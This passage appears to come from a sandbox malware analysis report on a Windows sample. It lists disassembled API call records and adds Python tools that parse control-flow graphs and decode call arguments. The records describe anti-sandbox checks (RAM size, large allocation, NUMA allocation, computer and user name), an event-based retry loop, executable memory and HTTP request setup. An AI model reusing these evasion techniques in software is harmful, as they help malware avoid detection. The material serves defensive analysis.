                                control_flow_graph 1450 d96af3 1451 d96b0a 1450->1451 1453 d96aba-d96ad7 call d9aad0 OpenEventA 1451->1453 1454 d96b0c-d96b22 call d96920 call d95b10 CloseHandle ExitProcess 1451->1454 1460 d96ad9-d96af1 call d9aad0 CreateEventA 1453->1460 1461 d96af5-d96b04 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018290F8,?,00DA110C,?,00000000,?,00DA1110,?,00000000,00DA0AEF), ref: 00D96ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D96AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00D96AF9
                                • Sleep.KERNEL32(00001770), ref: 00D96B04
                                • CloseHandle.KERNEL32(?,00000000,?,018290F8,?,00DA110C,?,00000000,?,00DA1110,?,00000000,00DA0AEF), ref: 00D96B1A
                                • ExitProcess.KERNEL32 ref: 00D96B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 9dd956263815603d71680a6aa9dbd7d65e21bf9f6879778c6566850cb971656a
                                • Instruction ID: 184bc052551d7b33d9c1f3b67206fd5eebde9f4ca76f310d1769e3e7bc853c92
                                • Opcode Fuzzy Hash: 9dd956263815603d71680a6aa9dbd7d65e21bf9f6879778c6566850cb971656a
                                • Instruction Fuzzy Hash: 93F05870A4020DABEF00ABB0DD0ABBE7B34FF04749F104614B502A21C5DBB0A540EBB6
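Two of the records above carry a graph dump: the routine at d81220 (GlobalMemoryStatusEx, two 64-bit divisions via __aulldiv, then a branch whose one arm is ExitProcess, which is the shape of a physical-RAM threshold check) and the routine at d96aba (OpenEventA inside a loop that closes the handle and sleeps, with CreateEventA on the branch where the open fails and an ExitProcess block at the end). Joe Sandbox emits each graph as a single token stream. The Python below is an added example, not code from the report or from the sample; it parses that stream and answers the two questions an analyst reads these graphs for: which blocks reach ExitProcess and which imported APIs are called on the way there, and which blocks sit on a cycle. The two graph lines are copied verbatim from this page. The reading of the format (first listed block is the function entry, `call X` names an internal callee, `* N` repeats the preceding callee, every other bare token is an imported API) is an assumption drawn from these two samples.

```python
"""Parse Joe Sandbox 'control_flow_graph' token streams, one line per function.
Added example; the format rules below are inferred from the two dumps on this page."""
import re
from collections import defaultdict

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")

# Both graphs are copied verbatim from this report.
CFG_MEMCHECK = ("control_flow_graph 1436 d81220-d81247 call d989b0 GlobalMemoryStatusEx 1439 d81249-d81271 "
                "call d9da00 * 2 1436->1439 1440 d81273-d8127a 1436->1440 1442 d81281-d81285 1439->1442 "
                "1440->1442 1443 d8129a-d8129d 1442->1443 1444 d81287 1442->1444 1446 d81289-d81290 "
                "1444->1446 1447 d81292-d81294 ExitProcess 1444->1447 1446->1443 1446->1447")
CFG_EVENT = ("control_flow_graph 1450 d96af3 1451 d96b0a 1450->1451 1453 d96aba-d96ad7 call d9aad0 OpenEventA "
             "1451->1453 1454 d96b0c-d96b22 call d96920 call d95b10 CloseHandle ExitProcess 1451->1454 "
             "1460 d96ad9-d96af1 call d9aad0 CreateEventA 1453->1460 1461 d96af5-d96b04 CloseHandle Sleep "
             "1453->1461 1460->1454 1461->1451")


def parse_cfg(line):
    """Return (nodes, succs). nodes: id -> {'addr', 'calls'}; succs: id -> successor ids.
    Assumed grammar: '<id> <addr[-addr]>' opens a block, 'call X' is an internal callee,
    '* N' repeats the previous callee N times, 'a->b' is an edge, anything else is an
    imported API invoked in the current block."""
    toks = line.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    nodes, succs, cur, i = {}, defaultdict(list), None, 0
    while i < len(toks):
        t = toks[i]
        m = EDGE.match(t)
        if m:
            succs[int(m.group(1))].append(int(m.group(2)))
        elif NODE_ID.match(t) and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            cur = int(t)
            nodes[cur] = {"addr": toks[i + 1], "calls": []}
            i += 1
        elif t == "call":
            nodes[cur]["calls"].append("sub_" + toks[i + 1])
            i += 1
        elif t == "*":
            nodes[cur]["calls"].extend([nodes[cur]["calls"][-1]] * (int(toks[i + 1]) - 1))
            i += 1
        else:
            nodes[cur]["calls"].append(t)
        i += 1
    for n in nodes:
        succs.setdefault(n, [])
    return nodes, dict(succs)


def exit_blocks(nodes, api="ExitProcess"):
    return sorted(n for n, d in nodes.items() if api in d["calls"])


def reachable(succs, start):
    seen, stack = set(), list(succs.get(start, []))
    while stack:
        n = stack.pop()
        if n not in seen:
            seen.add(n)
            stack.extend(succs.get(n, []))
    return seen


def loop_blocks(succs):
    """Blocks that can reach themselves, i.e. that sit on a cycle (retry/poll loops)."""
    return sorted(n for n in succs if n in reachable(succs, n))


def apis_on_exit_paths(nodes, succs, entry=None):
    """Imported APIs of every block that can still reach an exit block, walked
    breadth-first from the entry: the check that guards the ExitProcess."""
    entry = next(iter(nodes)) if entry is None else entry
    exits = set(exit_blocks(nodes))
    on_path = {n for n in nodes if n in exits or reachable(succs, n) & exits}
    order, seen, queue = [], set(), [entry]
    while queue:
        n = queue.pop(0)
        if n in seen or n not in on_path:
            continue
        seen.add(n)
        order += [c for c in nodes[n]["calls"] if not c.startswith("sub_") and c not in order]
        if n not in exits:
            queue.extend(succs.get(n, []))
    return order


def summarize(line):
    nodes, succs = parse_cfg(line)
    return {"blocks": len(nodes), "edges": sum(len(v) for v in succs.values()),
            "exits": exit_blocks(nodes), "loops": loop_blocks(succs),
            "apis_before_exit": apis_on_exit_paths(nodes, succs)}


if __name__ == "__main__":
    for name, cfg in (("memcheck", CFG_MEMCHECK), ("event", CFG_EVENT)):
        print(name, summarize(cfg))
```

For the d81220 graph the only imported API on the exit path is GlobalMemoryStatusEx, which is what one expects from a check that aborts when the reported RAM is below some threshold; the threshold itself is in the __aulldiv arithmetic and is not visible in the report. For the d96aba graph the cycle 1451, 1453, 1461 is the OpenEventA/CloseHandle/Sleep retry loop, and CreateEventA sits on the branch that leaves it.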

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D84839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00D84849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 07350176952d73aa391ddae94411aa7193a20375ec5f8b1243bd7b23d0b478db
                                • Instruction ID: 3a8c8b3c3e95b85993da4786553fd121f09c1b90b3589bb72e41614093c650b6
                                • Opcode Fuzzy Hash: 07350176952d73aa391ddae94411aa7193a20375ec5f8b1243bd7b23d0b478db
                                • Instruction Fuzzy Hash: C3214FB1D00209ABDF14DFA4E845ADE7B74FF44320F108625F915A72C1EB706A09CF91

                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D86280: InternetOpenA.WININET(00DA0DFE,00000001,00000000,00000000,00000000), ref: 00D862E1
                                  • Part of subcall function 00D86280: StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D86303
                                  • Part of subcall function 00D86280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D86335
                                  • Part of subcall function 00D86280: HttpOpenRequestA.WININET(00000000,GET,?,0182E1B0,00000000,00000000,00400100,00000000), ref: 00D86385
                                  • Part of subcall function 00D86280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D863BF
                                  • Part of subcall function 00D86280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D863D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D95228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: 74891e2443416f78705b0082af7c10a79e88c7638a63d1587086d1237fb33a54
                                • Instruction ID: c1fb7c470e40482b2b5de0a04f5439d46273b1425a687d61fdd72d6e25d0d9c3
                                • Opcode Fuzzy Hash: 74891e2443416f78705b0082af7c10a79e88c7638a63d1587086d1237fb33a54
                                • Instruction Fuzzy Hash: 3D11DA31910148ABCF14FBA8DD52AED7378EF50340F404168F81A5A592EF30AB0AC7B5
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D8112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D81132
                                • ExitProcess.KERNEL32 ref: 00D81143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 9d61226dfdc27b2c894e308aa947b0ce97a1a46ab89ec9eb2b57737b2aca58d8
                                • Instruction ID: 91519763bf4969cc1f0d3d354345be0e21bf1cd7e467296c14e7c9836560eacf
                                • Opcode Fuzzy Hash: 9d61226dfdc27b2c894e308aa947b0ce97a1a46ab89ec9eb2b57737b2aca58d8
                                • Instruction Fuzzy Hash: A6E0E67494530CFBE7106BA09D0FF09767CEB04B05F104054F709771D0D6B53A45A7A9
                                APIs
                                • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 01232EAA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: V
                                • API String ID: 544645111-1342839628
                                • Opcode ID: 579f81dcd1b550f5ba05108ab649187747fda37f42e707827d6b25ebf833ed2f
                                • Instruction ID: d5fb9a2c0e7f6869814e68d2ba8893311fd4ba6196858049b6462b24404e9c07
                                • Opcode Fuzzy Hash: 579f81dcd1b550f5ba05108ab649187747fda37f42e707827d6b25ebf833ed2f
                                • Instruction Fuzzy Hash: 1031F2F263C309DFDB15AF18DC8276EBBA4FB84300F04052DDB8247650E6B66D548B9A
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D810B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00D810F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 0cf4552bd03802938ba96430d32412105fc2fe2d88d44b4852ce5eaac8d0b814
                                • Instruction ID: 6c13312e656a847f4694190bab9205e43c9377f8b5983a551032706516ae1d21
                                • Opcode Fuzzy Hash: 0cf4552bd03802938ba96430d32412105fc2fe2d88d44b4852ce5eaac8d0b814
                                • Instruction Fuzzy Hash: 66F0E27164120CBBEB14ABA4AC4AFAAB7ECE705B15F301448F504E3280D572AE04DBA0
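The APIs lists in these records show the raw stack values at each call site, and several of them are the whole story of the routine once decoded: VirtualAlloc(NULL, 0x17C841C0, 0x3000, 0x4) is a 399,000,000-byte (about 380 MiB) MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE allocation immediately released with MEM_RELEASE (0x8000), a pattern that fails on sandboxes with little memory; VirtualProtect with 0x40 is PAGE_EXECUTE_READWRITE; OpenEventA with 0x1F0003 is EVENT_ALL_ACCESS and Sleep(0x1770) is 6 seconds; on the WinINet path InternetOpenA uses access type 1 (INTERNET_OPEN_TYPE_DIRECT), InternetConnectA service 3 (INTERNET_SERVICE_HTTP), HttpOpenRequestA flags 0x00400100 (INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE) and InternetSetOptionA option 31 (INTERNET_OPTION_SECURITY_FLAGS) with a 4-byte buffer. The values 0x7D0, 0x3000 and 0x40 on the GetCurrentProcess line are most plausibly the arguments already pushed for the VirtualAllocExNuma call that follows it, i.e. a 2000-byte RWX allocation on node 0; that is a reading of the stack snapshot, not something the report states. The Python below is an added example, not part of the report, that decodes these lines mechanically; the constant tables are standard Windows SDK values and the sample lines are copied from this page.

```python
"""Decode the raw argument values in Joe Sandbox 'APIs' lines into Win32 names.
Added example; constant values are the standard Windows SDK definitions."""
import re

API_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{1,8}$")

MEM = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
       0x8000: "MEM_RELEASE", 0x100000: "MEM_TOP_DOWN"}
PAGE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
        0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
        0x40: "PAGE_EXECUTE_READWRITE", 0x100: "PAGE_GUARD"}
INET_FLAGS = {0x100: "INTERNET_FLAG_PRAGMA_NOCACHE", 0x200: "INTERNET_FLAG_NO_UI",
              0x80000: "INTERNET_FLAG_NO_COOKIES", 0x400000: "INTERNET_FLAG_KEEP_CONNECTION",
              0x800000: "INTERNET_FLAG_SECURE", 0x4000000: "INTERNET_FLAG_NO_CACHE_WRITE",
              0x80000000: "INTERNET_FLAG_RELOAD"}
INET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INET_OPEN = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
             3: "INTERNET_OPEN_TYPE_PROXY"}
INET_OPTION = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT",
               6: "INTERNET_OPTION_RECEIVE_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS"}
EVENT_ACCESS = {0x1F0003: "EVENT_ALL_ACCESS", 0x2: "EVENT_MODIFY_STATE", 0x100000: "SYNCHRONIZE"}


def flags(v, table):
    """Bit-flag value to 'A|B' form, lowest bit first; unknown bits are kept as hex."""
    names = [n for bit, n in sorted(table.items()) if v & bit == bit]
    rest = v & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) or "0"


def named(v, table):
    return table.get(v, f"0x{v:X}")


def size(v):
    return f"{v} bytes" + (f" (~{v / 2**20:.1f} MiB)" if v >= 2**20 else "")


# API name -> {argument index: decoder}; indices follow the SDK prototypes.
DECODERS = {
    "VirtualAlloc":       {1: size, 2: lambda v: flags(v, MEM), 3: lambda v: flags(v, PAGE)},
    "VirtualAllocExNuma": {2: size, 3: lambda v: flags(v, MEM), 4: lambda v: flags(v, PAGE)},
    "VirtualFree":        {1: size, 2: lambda v: flags(v, MEM)},
    "VirtualProtect":     {2: lambda v: flags(v, PAGE)},
    "OpenEventA":         {0: lambda v: named(v, EVENT_ACCESS)},
    "Sleep":              {0: lambda v: f"{v} ms"},
    "InternetOpenA":      {1: lambda v: named(v, INET_OPEN)},
    "InternetConnectA":   {2: lambda v: f"port {v}", 5: lambda v: named(v, INET_SERVICE)},
    "HttpOpenRequestA":   {6: lambda v: flags(v, INET_FLAGS)},
    "InternetSetOptionA": {1: lambda v: named(v, INET_OPTION)},
}


def parse_args(raw):
    """'?' is an unresolved value; 1-8 hex digits are integers; anything else
    (GET, ERROR, a path) is kept as the string literal the report printed."""
    out = []
    for a in (raw.split(",") if raw else []):
        a = a.strip()
        out.append(None if a == "?" else int(a, 16) if HEX_RE.match(a) else a)
    return out


def decode(line):
    """Decode one APIs line; returns None for lines that are not API calls."""
    m = API_RE.search(line)
    if not m:
        return None
    api, module, raw, ref = m.groups()
    args = parse_args(raw)
    notes = {i: fn(args[i]) for i, fn in DECODERS.get(api, {}).items()
             if i < len(args) and isinstance(args[i], int)}
    return {"api": api, "module": module, "args": args, "ref": ref, "notes": notes}


def decode_report(lines):
    return [d for d in map(decode, lines) if d]


SAMPLE_LINES = [  # copied from the APIs lists on this page
    "• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D810B3",
    "• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00D810F7",
    "• VirtualProtect.KERNEL32(?,?,00000040,?), ref: 01232EAA",
    "• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018290F8,?,00DA110C,?,00000000,?,00DA1110,?,00000000,00DA0AEF), ref: 00D96ACA",
    "• Sleep.KERNEL32(00001770), ref: 00D96B04",
    "• Part of subcall function 00D86280: InternetOpenA.WININET(00DA0DFE,00000001,00000000,00000000,00000000), ref: 00D862E1",
    "• Part of subcall function 00D86280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D86335",
    "• Part of subcall function 00D86280: HttpOpenRequestA.WININET(00000000,GET,?,0182E1B0,00000000,00000000,00400100,00000000), ref: 00D86385",
    "• Part of subcall function 00D86280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D863BF",
    "• ExitProcess.KERNEL32 ref: 00D81143",
]

if __name__ == "__main__":
    for d in decode_report(SAMPLE_LINES):
        print(d["ref"], d["api"], d["notes"])
```

Running it over a whole report is a matter of feeding every line in; lines that are not API calls decode to None and are dropped. Arguments shown as `?` are values the disassembler could not resolve and are left undecoded rather than guessed.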
                                APIs
                                  • Part of subcall function 00D978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97910
                                  • Part of subcall function 00D978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D97917
                                  • Part of subcall function 00D978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D9792F
                                  • Part of subcall function 00D97850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D811B7), ref: 00D97880
                                  • Part of subcall function 00D97850: RtlAllocateHeap.NTDLL(00000000), ref: 00D97887
                                  • Part of subcall function 00D97850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D9789F
                                • ExitProcess.KERNEL32 ref: 00D811C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: f2adac6829c95187bba53b9ab19aa6f3eb19378bb1196d9e34356e1013c436eb
                                • Instruction ID: 752ad098e9eb122c6ad07e409ba07b8970527ba38190f0086292b0dc380dd12e
